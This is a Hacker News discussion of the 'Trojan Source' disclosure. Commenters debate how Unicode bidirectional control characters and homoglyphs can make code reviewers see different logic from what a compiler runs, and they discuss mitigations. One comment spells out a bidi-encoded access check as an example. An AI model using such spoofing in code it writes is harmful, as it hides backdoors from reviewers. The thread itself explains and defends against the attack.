[HN Gopher] 'Trojan Source' Bug Threatens the Security of All Code
       ___________________________________________________________________
        
       'Trojan Source' Bug Threatens the Security of All Code
        
       Author : picture
       Score  : 442 points
       Date   : 2021-11-01 04:24 UTC (18 hours ago)
        
 (HTM) web link (krebsonsecurity.com)
 (TXT) w3m dump (krebsonsecurity.com)
        
       | jwilk wrote:
       | Another HN discussion:
       | 
       | https://news.ycombinator.com/item?id=29061987
        
       | pabs3 wrote:
       | Are there any linters that detect these sorts of issues?
        
       | marcodiego wrote:
       | I thought this was a case of Source code virus[1]. With the
       | current popularity of open source and services like github,
       | combined with deep inter-dependencies in node.js, a virus of this
       | kind could have a huge impact if unnoticed for long enough.
       | 
       | Maybe it is the next plague waiting to happen?
       | 
       | [1] https://en.wikipedia.org/wiki/Source_code_virus
        
       | qwerty456127 wrote:
       | Despite I'm not a native English speaker and I meant almost all
       | the programs I ever wrote to be capable of processing any given
       | language (and also have localized UIs in some cases), I see no
       | reason for non-English strings to be allowed in source code and
       | code files except some ad-hoc scripts in which hard-coding some
       | text can be an optimal solution.
       | 
       | We probably just need a git switch which would make it throw an
       | error if it encounters Bidi or any weirdness like that except in
       | resource files.
        
         | mkl wrote:
         | Non-English characters are quite useful in comments where
         | you're explaining Unicode processing stuff, and in regexes
         | working with the characters, and when you're using maths
         | notation (proper symbols in comments, Greek letters for
         | variables, etc.), and when you're drawing boxes in a terminal.
         | I'm sure there are many more too.
        
           | qwerty456127 wrote:
           | I omitted this to keep it simple (this is why I wrote non-
           | English rather than non-ASCII, I actually am a proponent of
           | active usage of proper Unicode symbols like =, [?], etc, and
           | also TUIs) but yes, I would prefer a rather extended English
           | char-set including Greek letters, mathematical symbols,
           | pseudographics etc. These can be useful and are not much
           | trickier than English letters. But I would certainly like to
           | see at least a warning (I would even prefer an Error
           | actually) if my code file includes anything related to RTL,
           | complex character composition or non-Latin letters other than
           | Greek.
        
         | samus wrote:
         | Since most progamming languages are based on english, non-
         | english text in string literals is almost always user-facing
         | and should be put in resource files to make translation into
         | additional languages easier.
         | 
         | Identifiers and comments are a serious problem though. Many
         | application domains use terms that are tricky to translate into
         | english. The translations could be misleading, inappropriate or
         | not unique. Sometimes they are just plain wrong or there is no
         | english word that fits. All of these could cause
         | misconceptions, confusion and bugs, and make reading and
         | working with the code and the running system harder.
        
           | qwerty456127 wrote:
           | So you mean you can write a program and be unable to explain
           | what it does in plain English?
        
           | josephcsible wrote:
           | > Many application domains use terms that are tricky to
           | translate into english.
           | 
           | What if instead of translating those terms to English, you
           | just transliterated them to the Latin alphabet?
        
       | dwheeler wrote:
       | As I previously noted on a related post:
       | 
       | Interesting paper. Note, however, that the general problem is
       | already known and there are a number of pre-existing works that
       | discuss it. This is typically called "underhanded code" or
       | sometimes "maliciously misleading code". I'm surprised that they
       | didn't use the normal term for the problem nor cite the previous
       | work on it - maybe they didn't realize this was a widely-known
       | problem? Previous works on underhanded code didn't discuss Bidi
       | to my knowledge (though other attacks on text like this have
       | exploited Bidi). Here are a number of other materials about
       | underhanded code:
       | 
       | The Obfuscated V Contest
       | (http://graphics.stanford.edu/~danielh/vote/vote.html) was
       | created by Daniel Horn in 2004 and is the earliest "underhanded"
       | programming contest that I found. It was a contest to create
       | source code that looked like it did one thing, but actually did
       | another.
       | 
       | Underhanded C Contest (http://www.underhanded-c.org/) has run in
       | many years. Per its FAQ, "The Underhanded C Contest is an annual
       | contest to write innocent-looking C code implementing malicious
       | behavior."
       | 
       | My PhD dissertation "Fully Countering Trusting Trust through
       | Diverse Double-Compiling" discusses how to counter the "trusting
       | trust" problem & includes a section about maliciously misleading
       | source code. See: https://dwheeler.com/trusting-trust/
       | 
       | The JavaScript Misdirection Contest announced the winner on
       | September 27, 2015 http://misdirect.ion.land/
       | 
       | My paper "Initial Analysis of Underhanded Source Code", (by David
       | A. Wheeler, April, 2020, IDA document: D-13166), discusses
       | underhanded code and the effectiveness of several potential
       | countermeasures. It also includes a number of citations to other
       | works on underhanded code. https://www.ida.org/research-and-
       | publications/publications/a...
        
         | kfichter wrote:
         | First place winner of last year's underhanded Solidity contest
         | used exactly this trick:
         | https://blog.soliditylang.org/2020/12/03/solidity-underhande...
        
           | axic wrote:
           | There was related issue in 2018 regarding line endings, which
           | would allow disguised some lines as code, but keeping them as
           | comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWC
           | gXqLnw8FN...
           | 
           | Both of these were fixed in Solidity shortly after the bug
           | reports.
           | 
           | (P.S. I'm a member of the Solidity team)
        
         | taviso wrote:
         | It's also worth noting that if you're caught playing games like
         | this, there is really no way to explain your actions that would
         | avoid serious consequences.
         | 
         | If however, you used the "bugdoor" method, you can plausibly
         | deny any malicious intent and you will absolutely get away with
         | it.
        
       | ChrisMarshallNY wrote:
       | Looks like avoiding dependencies and snippets is a good way to
       | mitigate this.
       | 
       | In my own work, I use almost no dependencies (aside from
       | compilers and built-in APIs). Scratch that. I use a _lot_ of
       | dependencies, but ones that I have written, and generally rewrite
       | snippets, when I use them.
       | 
       | Also, very little of the code I see, has comments.
       | 
       | Like, _any_ comments; even headerdoc comments.
       | 
       |  _> Green said the good news is that the researchers conducted a
       | widespread vulnerability scan, but were unable to find evidence
       | that anyone was exploiting this. Yet._
       | 
       | ... "yet" ...
       | 
       | I know that I'm a "dependency curmudgeon," but stuff like this
       | just serves to reinforce my posture.
        
         | Cthulhu_ wrote:
         | But what if this is slipped into your compiler? Your operating
         | system's kernel? A top voted Stack Overflow answer? You can't
         | (or it's infeasible to) check and control everything.
        
         | _3u10 wrote:
         | Yes, you're totally safe then. I've never heard of standard
         | libraries having problems that affect security, certainly not
         | the str* family of functions.
        
           | ChrisMarshallNY wrote:
           | Any particular reason for the nasty? I thought we didn't do
           | that kind of thing, around these parts, but I'm often wrong.
        
             | _3u10 wrote:
             | The pain of having worked under these conditions of not
             | using libraries, usually having to work with subpar
             | libraries that were developed internally.
             | 
             | Like oh, hey, we need a database, great, lets roll our own.
             | Or the ancient version of whatever lib shipped with the OS
             | that is full of bugs solved in subsequent versions.
             | 
             | I see that you now use a lot of dependencies, and retract
             | my statement.
        
         | ChrisMarshallNY wrote:
         | sigh...Why does it have to be "all or nothing"? These logical
         | fallacies are pretty much a standard in these discussions.
         | 
         | Either have 100%, ironclad security, or "Who cares? YOLO! STDs
         | be damned" abandon?
         | 
         | We do what we can to make sure what _we_ write is as good as
         | possible.
         | 
         | I lock my car door, when I get out. I know that it won't stop a
         | determined thief, but it will avoid problems from the casual
         | knucklehead.
        
       | WalterBright wrote:
       | Homoglyphs are a disaster and should never have been admitted
       | into Unicode. There should never have been invisible semantic
       | information embedded in Unicode.
        
       | josephcsible wrote:
       | Why is bidirectionality handled when text is being rendered onto
       | the screen, instead of when it's being input from the keyboard?
       | Why not render every single character in LTR order, and have RTL
       | support instead be handled by text input fields moving the cursor
       | in the opposite direction after each RTL character is typed? (I
       | know it's too late to change this now. I'm asking why we didn't
       | do it this way from the beginning.)
        
         | jart wrote:
         | If I understand correctly, what you're suggesting could be
         | thought of as pre-rendering directionality into the memory
         | layout. If we did that then it might compromise our ability to
         | write an algorithm that iterates over a string of hebrew or
         | arabic characters. Display is super complicated and people
         | don't agree on how to do it. For example, consider the arabic
         | text `wd@ 'bw tyh. If I sneak a latin A between all those
         | characters to prevent the display algorithm from rearranging
         | and shaping them, then that same string looks like this:
         | `AwAdA@A'AbAwAtAAyAh. Those are the same characters and you can
         | confirm that yourself using:                   for c in '`wd@
         | 'bw tyh':           print(unicodedata.name(c))
         | 
         | On the other hand if you want to romanize that string as EWDTA
         | AEBW TAIH then all you need is a for loop and a switch
         | statement, because the memory order is always left to right. We
         | can also rest assured that if someone invents a better display
         | algorithm, we won't need to do any database migrations, since
         | the encoding itself doesn't need to change.
        
         | swiftcoder wrote:
         | If you have a document with mixed languages, you need to be
         | able to edit each language in its natural direction after the
         | fact. That requires storing directionality in the document.
         | 
         | And keep in mind that if you store RTL text backwards, as you
         | propose, every algorithm now has to be able to process
         | backwards text. Backwards spellcheck is a lot of extra work...
        
         | laurowyn wrote:
         | Because visual representation is separate from the underlying
         | data structure. A string container doesn't have a specific
         | direction, only a relative one. I.e. This character comes
         | before the next and after the previous. Adding the bidi control
         | code, the string indicates when the visual ordering changes in
         | this relative direction system.
         | 
         | You could absolutely design a new string container that assumes
         | left to right at all times and cannot be changed, but then it's
         | on the programmer to ensure that strings are copied or
         | concatenated in the right direction, at the right location, and
         | substrings searching becomes a minor headache. How would you
         | concatenate an RTL string to a forced LTR string
         | representation? You would have to work out whether the end of
         | the string it LTR or RTL. If LTR, append directly. If RTL find
         | the character where the direction changes and insert the string
         | in there - much more expensive. Better to just append the
         | string, using bidi codes where required, and let the frontend
         | process the string to make the appropriate direction changes.
         | Yes, you may need to search the string for the bidi code to
         | know which direction you're going at the end of the string, but
         | that's just a simple reverse string search for a single control
         | character, and not a complex variable multi-byte search of
         | inferred character directions by codepoint values.
         | 
         | I think the issue is in the locations of which bidi codes are
         | rendered. They provide an inherent untrustworthy-ness to the
         | text area they're rendered in, and so should be treated as an
         | exception in critical situations. I've seen the reversed exe
         | file name trick used for years, and every time I ask myself why
         | that's even a thing? If the OS used file headers and magic
         | numbers to determine file types instead of the filename, it
         | would be less of an issue.
         | 
         | For source code, I would question the rendering of RTL text in
         | a source code editor as it's an obvious issue for code safety.
         | Ideally, all source code would be kept to the same origin
         | language - doesn't have to be english, just consistent. Any
         | non-conforming text should ideally be loaded from a resource
         | rather than inline within the source code, to avoid foreign
         | character contamination and allow easier identification of
         | these issues. Further, source code rendering should only render
         | identified safe control codes, and treat unsafe ones as raw
         | binary values to be shown as such - i.e. \r and \n are safe, \b
         | is unsafe, and bidi codes would also be unsafe. You could even
         | go so far as to include them in the syntax highlighting, but
         | that results in a dependency on syntax highlighting to show the
         | semantics of the source code rather than the text alone.
        
         | [deleted]
        
         | malf wrote:
         | Flip left and right in your idea, and you can try it out
         | without learning a new language. Remember to implement word
         | wrap.
        
       | fullstackchris wrote:
       | I fail to see how this can actaully be used as an exploit. As
       | some commenters have said, yes, it may be a risk to some open
       | source tools where there is poor due diligence for merge request
       | review process - but that is almost never the case.
       | 
       | Otherwise, if you own your own code, this obviously isn't an
       | issue. (Unless, of couse, for some reason you want to program
       | exploits into software at your organization :) )
       | 
       | Heck, even GitHub already shows a warning for files that have bi-
       | directional unicode...
       | 
       | A bit of an overemotional title if you ask me.
        
         | pietroalbini wrote:
         | It's this research that prompted GitHub to show warnings, they
         | didn't appear as of yesterday.
        
         | willvarfar wrote:
         | https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a
         | nice clear example.
         | 
         | Full Stack Chris reviews some code that he thinks says:
         | if access_level != "user" { // Check if admin
         | 
         | This may be an open source project. This may be an internal bad
         | egg (a very common threat; insider jobs are actually one of the
         | absolute top risks to a company). Or this code may be injected
         | by an attacker who has gained access to the repo and is leaving
         | backdoors that they hope to survive long after their access is
         | blocked or leaving backdoors to make deployed production
         | systems vulnerable. Etc.
         | 
         | And Chris won't notice that the computer will execute:
         | if access_level != "user{U+202E} {U+2066}// Check if
         | admin{U+2069} {U+2066}" {
         | 
         | This is not just an attack on compiled languages. Scripting
         | languages are just as vulnerable.
        
           | kiklion wrote:
           | Sorry, still don't get it.
           | 
           | Isn't the issue that they are using magic strings? If the
           | strings were something like RoleConstants.Admin then this is
           | avoided?
           | 
           | Though I don't understand the point of the Unicode characters
           | in the comment string so I must be missing something.
        
             | tzs wrote:
             | > Though I don't understand the point of the Unicode
             | characters in the comment string so I must be missing
             | something.
             | 
             | There is no comment string.
        
               | kiklion wrote:
               | So after reading other parts, I get where I was mistaken
               | but still believe proper coding practices of avoiding
               | magic strings would avoid many of the potential issues.
               | 
               | My mistake was thinking the initial Unicode character was
               | changing the comparison string similar to a non printable
               | character could. But instead it flips the ordering so
               | that the comment is part of the comparison string and
               | then the string is terminated.
        
           | sethammons wrote:
           | And the dev wrote test cases (negative ones too!). The test
           | fails and shows admin privileges for the normal user.
           | Debugging ensues. I'd hope.
        
             | wizzwizz4 wrote:
             | The test has the same kind of change. It passes, and nobody
             | thinks to look at the obviously-correct code.
        
       | throw10920 wrote:
       | Or, hear me out - instead of trying to work around a legitimate
       | _feature of Unicode_ , you could stop _storing your source code
       | as text_ , because it _isn 't_. _Code is not text_ - it 's a tree
       | of objects, and representing it as a flat sequence of text
       | characters causes _many_ problems and inefficiencies (including
       | this one!) that could be mitigated if you _just stored and
       | manipulated it as a tree_.
       | 
       | The only reason why text was justifiable as a storage and
       | manipulation format for code in the first place was because early
       | computers (probably?) couldn't handle a tree format. That excuse
       | has been invalid for several decades now, as is the idea that
       | "everything is plain text". Code _isn 't_ plain text - if it was,
       | then you could make arbitrary edits without syntax errors, but
       | you can't, because code has _structure_. Start treating it that
       | way.
        
         | shaunxcode wrote:
         | Yes! This would also do away with a whole class of conflicts
         | related to whitespace/formatting.
        
           | throw10920 wrote:
           | Exactly! Imagine a version control system where you get diffs
           | on the AST tree, instead of the characters that make up the
           | source (add an `if` and suddenly dozens of lines have
           | "changed"), or the tabs/spaces flamewar evaporating
           | instantly.
        
         | scintill76 wrote:
         | Also helps with naming. Only need a value once or twice? Don't
         | bother trying to name it, just link it into the tree where it's
         | needed.
        
         | rocqua wrote:
         | The thing about text is that it is barebones. Everyone can
         | agree what the structure of text is (a stream of bytes with
         | some ascii like encoding).
         | 
         | For representing code as more than text, you will lose so much
         | tools that can handle your code, it's a massive set back. Add
         | to that how much effort it takes to get people onboarded on
         | your new representation, and things look bleak for adoption.
         | 
         | Finally, programmers really like looking under the hood. And
         | with plain text, you know exactly what your code looks like in
         | bytes.
        
           | throw10920 wrote:
           | > The thing about text is that it is barebones.
           | 
           | That's a bug. Programming is _hard_ , and you want the best,
           | most powerful tools to handle it as you can - which means
           | putting effort into making _specialized_ tools instead of
           | using generic ones like text editors.
           | 
           | > For representing code as more than text, you will lose so
           | much tools that can handle your code, it's a massive set
           | back.
           | 
           |  _No_ tools existed without first being built, so this isn 't
           | special. Rust didn't have any tools before people started
           | building tools for it, for instance.
           | 
           | Moreover, the tools that we have now that are text-specific
           | are _pathetic_. You can view the first _n_ lines of a file?
           | Wow, very impressive  /s. More complex things like grep are
           | just as realizable in a structure editor, and in order to use
           | them for non-trivial stuff, you'd have to write structural
           | regular expressions and implement mini-parsers _anyway_ -
           | things you would get for free if you just kept code as
           | structure.
           | 
           | > Add to that how much effort it takes to get people
           | onboarded on your new representation, and things look bleak
           | for adoption.
           | 
           | You're misreading my argument. I'm not saying that people
           | _will_ adopt structured code (a descriptive statement), I 'm
           | saying that people _should_ adopt structure code (a normative
           | statement) because it 'll be much better for them.
           | 
           | Also, you're making the assumption that onboarding is hard,
           | and that compatibility layers can't exist - neither of which
           | are true.
           | 
           | > Finally, programmers really like looking under the hood.
           | And with plain text, you know exactly what your code looks
           | like in bytes.
           | 
           | The average programmer probably looks at their code with a
           | hex editor once in their life - this isn't really a good
           | argument. Moreover, the vast majority of programmers already
           | tolerate _not_ looking under the hood in dozens of different
           | ways - most use VM 's like CPython/JVM/JS VMs, opaque
           | frameworks like React/Angular, graphics APIs like
           | OpenGL/DirectX/Vulkan, complicated editors like Visual Studio
           | Code/Emacs, and far more without ever looking under the hood
           | of _any_ of those - so there 's no reason to not add another
           | layer (especially because you can build that layer to be easy
           | to peer through) for the sake of productivity.
        
       | ziml77 wrote:
       | Would the solution to this be to render the direction switch
       | control character similar to how some text editors will render 0
       | bytes as a glyph with the text NUL? You could still render
       | everything after it with the reversed direction, but it provides
       | a visible indicator that it's been done. It might be a little
       | annoying for people who use RTL languages, but it seems like the
       | benefit may outweigh that.
        
       | simmo9000 wrote:
       | Here is an example, open it in an appropriate editor (vi) and you
       | can see how easy it is to 'exploit' (if you can call it that?).
       | 
       | https://github.com/nickboucher/trojan-source/blob/main/JavaS...
       | 
       | Seams like a layer 8 problem?
        
         | brundolf wrote:
         | GitHub has already updated their UI I see
        
           | techsolomon wrote:
           | Changelog - https://github.blog/changelog/2021-10-31-warning-
           | about-bidir...
        
           | Groxx wrote:
           | The Android app renders it much more suspiciously too, though
           | unfortunately no warning: https://imgur.com/a/L3sNFQ8
        
         | Semaphor wrote:
         | In case there are people who (currently) don't have access to
         | such an editor, here is a screenshot:
         | https://i.imgur.com/2Ue2Vvd.png
        
         | siddhesh wrote:
         | You mean, like this?
         | 
         | https://imgur.com/a/unKuOoK
         | 
         | Snark aside, most text based editors have some giveaway or
         | another. Even the GUI ones show syntax highlighting quirks that
         | show that something is wrong.
         | 
         | This is only really relevant in unicode-aware terminals,
         | without syntax highlighting and when you don't get to scroll
         | between characters. IOW, it's really quite hard to do.
        
       | z29LiTp5qUC30n wrote:
       | The bootstrappable community already produced a solution for
       | this:
       | https://github.com/oriansj/stage0/blob/master/High_level_pro...
        
       | samus wrote:
       | It's maybe worth to make a step back and take a new look at the
       | underlying problem.
       | 
       | Source code combines multiple kinds of text. There are
       | 
       | * hierarchical structure,
       | 
       | * mathematical and logical syntax
       | 
       | * literals (especially insidious: text)
       | 
       | * free text in comments and
       | 
       | * markup in documentation
       | 
       | These newly discovered vulnerabilities remind me of the issue of
       | SQL injection, which is also caused by a confusion when combining
       | these kinds of text.
       | 
       | For SQL injection, the solution was to introduce facilities to
       | explicitly combine SQL syntax and dynamic literals. Maybe we need
       | something similar for code that enforces such strict separation.
       | Maybe into different files or nested into a container format.
       | There are already facilities for doing so (resource files,
       | templating languages) but they are opt-in and don't go far enough
       | to address the newly discovered problems.
       | 
       | The cost would be that code could become more difficult to edit
       | with plain-text editors.
        
       | pdonis wrote:
       | This article talks about compilers, but what about interpreted
       | languages like Python or Lisp?
        
       | metroholografix wrote:
       | Emacs "fix": (setq bidi-display-reordering nil) in relevant
       | modes.
        
         | perihelions wrote:
         | I forced it globally, are there reasons that's bad to do?
         | (setf (default-value 'bidi-display-reordering) nil)
         | 
         | The BIDI issue looks pretty bad in emacs-gtk: the sneaky text
         | is unnoticeable in lots of modes, unless the cursor just
         | happens to scroll over it.
        
         | josephcsible wrote:
         | Why did you put "fix" in quotes? Isn't that an actual fix for
         | this?
        
           | cestith wrote:
           | It's more of a workaround that breaks things for people
           | legitimately using RTL strings isn't it?
        
       | zeepzeep wrote:
       | The good old SexyHexe.pdf strikes again.
       | 
       | These problems won't go away for a while, unicode is fucking
       | hard. Almost every app I ever tried it had at least some problems
       | with %u202E (the right to left overwrite),
        
       | jeroenhd wrote:
       | It all depends on your IDE. I've tried this, and IntelliJ and
       | friends will show a little block with the text RLO for the right
       | to left override or ZWS for zero with spaces for any non-standard
       | character that might mess things up. (Neo)vim will show the
       | unicode espace sequence instead of rendering the text as unicode
       | directs it.
       | 
       | Some compilers, notably clang, will warn you that you're using an
       | "invisible character". Assuming you at least read the warnings
       | your code generates (because if you don't, why not just put
       | exploitable algorithms deep down ontthe software?) you'd probably
       | catch the issue.
       | 
       | Simpler programs such as the text editor that ships with GNOME
       | will freak out, but I don't think most people are coding in that
       | in the first place.
       | 
       | I think this is an interesting peculiarity, but it's not a
       | "threat" to "the security of all code".
        
         | [deleted]
        
         | aulin wrote:
         | I'd say that neovim is bugged here and gedit is the one working
         | properly rendering unicode as it should be
        
       | tannhaeuser wrote:
       | That Unicode with its extremely large character set would become
       | a solution to any and all character encoding problems in itself
       | was never the case. Usually, for a given document you'll want to
       | declare the subset that's actually in use such that a particular
       | font with necessarily limited coverage can be used to render it.
       | That's what's available for SGML markup documents eg in an SGML
       | declaration, where you can declare and construct a document
       | character set from planes or arbitrary code point ranges, and an
       | SGML parser can verify actual content against that subset.
        
         | froh wrote:
         | Was that capability dropped in the transition from sgml to XML?
         | If so, can someone here on HN provide some pointers to the old
         | discussion?
        
           | tannhaeuser wrote:
           | All discussion related to create XML as an SGML subset can be
           | found on the xml-dev mailing list [1], with some earlier
           | discussions and initial drafts of the SGML ERB mostly linked
           | from there.
           | 
           | The capability to declare document character sets was dropped
           | along with supporting an SGML declaration altogether.
           | 
           | [1]: http://lists.xml.org/archives/xml-dev/
        
       | Gunax wrote:
       | I am still confused. Is the text not visible?
       | 
       | If I write some text in a comment, it should still be visibe,
       | regardless of direction/bidi code, right?
        
       | aww_dang wrote:
       | I filed this domain away under 'security alarmist nonsense' years
       | ago. This headline and story are prime examples of the form.
        
         | sydthrowaway wrote:
         | Seriously. State run espionage is 100x more likely
        
       | mmastrac wrote:
       | Fun story: I discovered these in the early 2000s and
       | simultaneously discovered that Slashdot didn't filter these out.
       | I spent an evening randomly reversing large sections of comment
       | pages until they finally blocked it.
       | 
       | I'm very, very sorry CmdrTaco.
        
         | kingcharles wrote:
         | Most web sites' comment sections will allow these. I think even
         | Facebook allows tomfoolery like this.
         | f[?][?][?][?]e[?][?][?][?]a[?][?][?]r[?][?][?][?]
         | [?][?][?][?]t[?]h[?][?][?][?]e[?] [?]u[?][?][?][?][?]t[?][?][?]
         | f[?][?]8[?]m[?][?][?][?][?][?]a[?][?][?][?]n[?][?][?]
        
           | Cthulhu_ wrote:
           | I've seen some sites / services (Discord?) filter these out,
           | at least to the point where they don't escape a message's
           | vertical space. I'm sure they're truncated because those
           | messages are pretty big in terms of amount of bytes.
           | 
           | And while they have valid use cases, I can't see it in e.g.
           | comment sections or chat messages. Happy to have someone link
           | to e.g. a Vietnamese comment section showing practical use
           | though.
        
             | Timwi wrote:
             | Vietnamese Wikipedia has plenty of Talk pages with
             | discussion threads.
        
           | scatters wrote:
           | Well yes, Facebook has users in Vietnam. Stacked diacritics
           | are a features, not a bug.
        
       | SavantIdiot wrote:
       | This exploit requires comments.
       | 
       | I think most code is safe.
        
       | pweezy wrote:
       | It's not the same thing, but brings to mind Ken Thomason's famous
       | "Reflections on Trusting Trust" [0] from 1984.
       | 
       | That describes a concept, over several stages, where a compiler
       | can be made to change the behavior of programs it compiles in a
       | difficult-to-find way.
       | 
       | [0]:
       | https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
        
       | kens wrote:
       | This reminds me of a trick you could do on the Commodore PET in
       | the 1980s, where you'd embed backspaces in your BASIC code. If
       | someone looked at the code they'd see something different from
       | what gets executed. Effective to keep someone from copying your
       | code in class :-)
        
       | TruthWillHurt wrote:
       | Is this a real cause for concern? Simply don't copy code with
       | strange unicode charecters, just like you don't copy code with
       | blocks of bytecode.
        
         | mkl wrote:
         | The point of the vulnerability is that you can't necessarily
         | see the strange Unicode characters.
        
         | samus wrote:
         | It's a problem in any environment where people can input
         | Unicode characters. Reviewers might use tools that are not able
         | to see those things.
         | 
         | At the same time, one can't just put a blanket ban on Unicode.
         | It exists for a reason. People _want_ to use their native
         | languages to name identifiers, or at least to write comments.
         | Restricting ourselves to ASCII again and thus forcing English
         | on everybody is not a solution.
        
           | lixtra wrote:
           | > Restricting ourselves to ASCII again and thus forcing
           | English on everybody is not a solution.
           | 
           | Yet most programming languages force them to use English
           | Arabic numbers.
           | 
           | Wouldn't it be great to use Roman numerals?
           | 
           | And then images in source code are really difficult to
           | handle. Wouldn't it be nice to compile a word document with
           | embedded images?
           | 
           | I think I wouldn't mind staying with ASCII for source code,
           | except for string literals (difficult enough).
        
       | TacticalCoder wrote:
       | Honest question: would it be _that_ bad to mandate and enforce
       | 100% ASCII source files? Arguably every and any Unicode character
       | and, well, arguably even any string of characters can (should?)
       | go to a properties /resources file (properties/resources files
       | which, btw, also greatly simplifies i18n/l10n).
       | 
       | Then build/commit/test hooks could be used to enforce that source
       | code files are indeed 100% ASCII.
       | 
       | I know, I know... Some are going to lament they don't have their
       | shiny Unicode symbols right in their source file. But... It looks
       | like you get what you pay for.
       | 
       | Bruce Schneier wrote it when Unicode came out btw: _" Unicode is
       | too complex to ever be secure"_.
        
         | EamonnMR wrote:
         | Having readable unicode in string literals is nice.
        
         | thereddaikon wrote:
         | Seems the bigger complaint isn't lack of fancy unicode in
         | comments its non-english speakers with non latin alphabets wont
         | be able to comment in their native language.
         | 
         | I'll leave it up to others to discuss how important this is or
         | isn't.
        
         | Jeff_Brown wrote:
         | > Bruce Schneier wrote it when Unicode came out btw: "Unicode
         | is too complex to ever be secure".
         | 
         | It's astounding to me that there's room for such complexity in
         | it. I thought it was just a lot of symbols. What other rules
         | does Unicode have besides changing the order sometimes?
        
           | ncc-erik wrote:
           | The one a lot of folks know about was the soft hyphen
           | (U+00AD) to bypass swear filters. I was able to use
           | normalization to create XSS attacks.
        
         | supperburg wrote:
         | How dare you suggest something sensible. The mob will soon be
         | knocking at your door.
        
         | InfiniteRand wrote:
         | Might be nice to have an easy tool to scan files and whitelist
         | characters from specific alphabets, because in most
         | international teams I think you'll have a common language for
         | comments, and so I think it's unlikely that you'll need say
         | European and Indic and Chinese characters in one code base.
         | Except the one pain point I can see - @author annotations in
         | the source code, if you have an international team you might
         | end up with a variety of scripts in that field, in my mind
         | that's something that can be lived without, but I can imagine
         | some people being sensitive about that.
        
         | dotancohen wrote:
         | Though I comment source in English, lots of people that I work
         | with comment in other languages. kvll `bryt, mymyn lshml.
        
         | SavantIdiot wrote:
         | Wouldn't simply stripping comments before doing any other
         | processing solve the problem? I know there are plenty of
         | programs that sprinkle code into comments, from Emacs to
         | linters. Or is this obviously naive?
         | 
         | Seems to me that if you need to put code in the comments,
         | you've got a bigger problem. I know people like tab hints and
         | lint overrides, but maybe it is time to focus on separation of
         | concerns at a higher level?
        
         | sfgweilr4f wrote:
         | Give it a few years and unicode will probably be turing-
         | complete. For reasons... likely not good ones though.
        
           | wizzwizz4 wrote:
           | Unicode rendering already requires multiple finite state
           | machines.
        
         | btbuildem wrote:
         | That was my first thought -- run all your source through an
         | ASCII-only filter, the problem goes away.
        
           | iforgotpassword wrote:
           | For projects like the Linux kernel this should be absolutely
           | feasible. A few names in headers get mangled and lose their
           | accents but that should be acceptable. Other projects... Well
           | there's already a couple examples in this comment section why
           | it won't be that easy.
        
       | visarga wrote:
       | Why is it called a Trojan horse instead of a Greek horse?
        
         | panarky wrote:
         | Because the Greeks transferred ownership.
        
       | pitdicker wrote:
       | Security advisory for the Rust programming language (with a nice
       | explanation): https://blog.rust-
       | lang.org/2021/11/01/cve-2021-42574.html
       | 
       | Rust 1.56.1 will be released later today.
       | 
       | > To assess the security of the ecosystem we analyzed all crate
       | versions ever published on crates.io (as of 2021-10-17), and only
       | 5 crates have the affected codepoints in their source code, with
       | none of the occurrences being malicious.
       | 
       | Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png
        
         | robin_reala wrote:
         | That's a really impressively written error message.
        
           | sodality2 wrote:
           | That's one of Rust's selling points. For all I've used the
           | rust compiler, not once have I ever not known what error it
           | was pointing out: its error messages are incredibly helpful.
           | Occasionally I am unsure _why_ it 's an error, but I always
           | know what it's referring to and what I could do to fix it.
        
             | Timwi wrote:
             | I've had the same experience with C#. The error messages
             | always state exactly what's wrong and where in the code
             | it's wrong. Many of them (especially compiler _warnings_
             | intended to point out syntax that is almost certainly a
             | bug) also tell you how to fix it (e.g. "consider using
             | 'new' keyword if hiding was intended").
        
               | hermitdev wrote:
               | Personally, I don't know why the last one ("consider
               | using 'new' keyword if hiding was intended") isn't an
               | error by default in C# . Not overriding the base method
               | is almost always a mistake, and if it's not a mistake,
               | better to be explicit about it, anyways. My $.02...
        
         | joosters wrote:
         | Their advisory is well-written and explains the problem well.
         | The example code they use:                 if access_level !=
         | "user" { // Check if admin
         | 
         | opens up a whole can of worms though. You don't need cunning
         | invisible control codes to break that line, you could just
         | replace any of the letters in 'user' with a different, but
         | almost-identical looking unicode symbol and you'd still have an
         | exploit. Even better, this would be a completely deniable
         | attack ("oops, I must have accidentally pressed alt-R while
         | typing that letter" excuse) - whereas explaining away why you
         | checked in some magical RTL/LTR encodings and hacked up a
         | comment is impossible. Plus, it would render well in far more
         | apps, terminals, command line programs, etc etc
        
           | codesections wrote:
           | > you could just replace any of the letters in 'user' with a
           | different, but almost-identical looking unicode symbol and
           | you'd still have an exploit.
           | 
           | The post mentions that exploit (and Rust's already existing
           | defense) in the appendix.
           | 
           | Here are the details, as explained in a previous post:
           | 
           | > The compiler will warn about potentially confusing
           | situations involving different scripts. For example, using
           | identifiers that look very similar will result in a warning.
           | warning: identifier pair considered confusable between `s`
           | and `s`
           | 
           | https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html
        
             | joosters wrote:
             | _The compiler will warn about potentially confusing
             | situations involving different scripts. For example, using
             | identifiers that look very similar will result in a
             | warning._
             | 
             | Unfortunately, I've little experience of rust, so I don't
             | have experience of that warning. It would certainly help
             | catch a one-liner exploit, but wouldn't it be excessively
             | noisy for code written in non-english languages?
        
               | wongarsu wrote:
               | It only warns if there actually are two identifiers that
               | look similar. Even if it's not malicious it's still
               | confusing and is worth renaming.
               | 
               | But if you want to, turning off specific warnings for a
               | file or block of code is really simple in rust, just add
               | "#[allow(confusable_idents)]"
        
               | estebank wrote:
               | The Unicode homoglyph lint will only trigger if there are
               | multiple identifiers that can look the same, it's not a
               | blanket warning on anything that isn't ASCII. It's close
               | to what browsers do with domain names. And you can always
               | allow lints.
        
             | lol768 wrote:
             | Am I missing something here? The spacing around these
             | homoglyph is _almost always_ noticeably wider than it
             | should be such that I don 't understand how you could ever
             | miss it in any half-decent code review.
             | if access_level != "user" { // Check if admin
             | if access_level != "user" { // Check if admin
             | 
             | Come on, that looks _obviously_ off.
        
               | nonameiguess wrote:
               | If you were really reviewing that code, Rust has
               | algebraic data types, and access level should be an Enum,
               | not a String.
               | 
               | But it's their example. The problem isn't with
               | homoglyphs, though. It's with bidi control characters,
               | which are invisible to a human but not to the compiler,
               | which is how generated code can end up semantically
               | different from source code, which is the actual problem
               | here. What you see in code review would be the first
               | line, even though that isn't actually what is in the
               | source, because an editor that is bidi-aware would show
               | it that way.
        
